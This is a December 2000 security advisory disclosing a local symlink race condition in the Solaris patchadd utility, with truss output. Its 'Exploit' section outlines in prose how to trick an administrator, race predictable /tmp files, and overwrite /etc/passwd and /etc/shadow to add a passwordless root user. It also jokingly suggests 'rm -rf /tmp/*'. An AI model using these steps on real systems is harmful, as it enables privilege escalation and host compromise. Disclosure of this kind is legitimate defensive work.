|
|
Home : Advisories : Solaris patchadd symlink vulnerability
| Title: |
Solaris patchadd symlink vulnerability |
| Released by: |
Jonathan Fortin |
| Date: |
19th December 2000 |
| Printable version: |
Click here |
I was playing around with patchadd and the bug was found when I issued a
"truss -f -o patch.log patchadd patch" where patch was a tarball and then
patchadd omitted an error because of it being a tarball, so then when I went
through the debug output, i found out that there was a serious race
condition vulnerability.
Line Pid exec call
105: 12869: open64("/tmp/sh12869.1", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
136: 12869: open64("/tmp/sh12869.2", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
481: 12869: open64("/tmp/sh12869.3", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
file "/tmp/sh12869.1":
105: 12869: open64("/tmp/sh12869.1", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
106: 12869: write(3, "\n U s a g e : p a t c".., 482) = 482
107: 12869: close(3)
file "/tmp/sh12869.2":
136: 12869: open64("/tmp/sh12869.2", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
137: 12869: write(3, " m a i l =\n i n s t a n".., 145) = 145
138: 12869: close(3)
file "/tmp/sh12869.3:
481: 12869: open64("/tmp/sh12869.3", O_RDWR|O_CREAT|O_TRUNC, 0666) = 3
482: 12869: close(61) Err#9 EBADF
483: 12869: fcntl(3, F_DUPFD, 0x0000003D) = 61
484: 12869: close(3)
Race Condition
remote NO
local YES
Vulnerable: I only checked Solaris 2.7 sparc with latest install_cluster
installed.
Discussion:
When patchadd is executed, It creates a temporary file called
"/tmp/sh.1" , "/tmp/sh.2 ,
"/tmp/sh.3 and assigns them mode 666 then gets unlink'd upon
exit.A vulnerability exist in patchadd, a patch utility shipped with
Solaris, where as if an attacker predicts the correct pid of the next
process before execution of patchadd by another user or If he creates a fiew
hundred symlinks to brute force the pid before execution of patchadd, he can
with a symbolic link pointing to a specific key system file, overwrite
contents of the file , he can do up to 3 file simultaneously, and user will
be able to do his own modifications to this file since this file would have
world-write permissions resulting in a increase of privilege and host
compromise.
Exploit:
1. Email admin telling him theirs a new patch out there that needs to be
installed.
2. Create a perl/C script that will copy /etc/passwd and /etc/shadow to a
hidden file that you will want to be appended to /etc/shadow/passwd later
on, get the next current available process , create 2 symlinks and when the
current process id is taken, then stat for /etc/passwd and /etc/shadow to be
666, if not avail, do it again, when avail, append a user with id 0 no
password to those hidden files , then those files will truncate /etc/passwd
and /etc/shadow then will be appended to them and send ya an email to login
and take advantage!
3. su trojand_user
4. #
Solutions:
None that I can think of, setting $TMPDIR didn't work, chroot won't work
because your applying patches to your current root unless you want to cp -rp
them to you real root after but that would be shitty.
hrm.. :<
Only solution is to rm -rf /tmp/* /tmp/.* , pull out twisted pair cables
from the box, then make sure no users are on, make sure theirs no cron/at
job runing
by 3rd party user, and then invoke patchadd :) (im trying to be funny)
Thank you
Sincerely,
Jonathan Fortin
*************************************
* Jonathan Fortin, Unix Engineer *
* Company: Revelex Corporation *
* Email: jfortin@revelex.com *
* Mobile: 514-244-6208 *
* Tel: 514-938-8405 *
*************************************
|
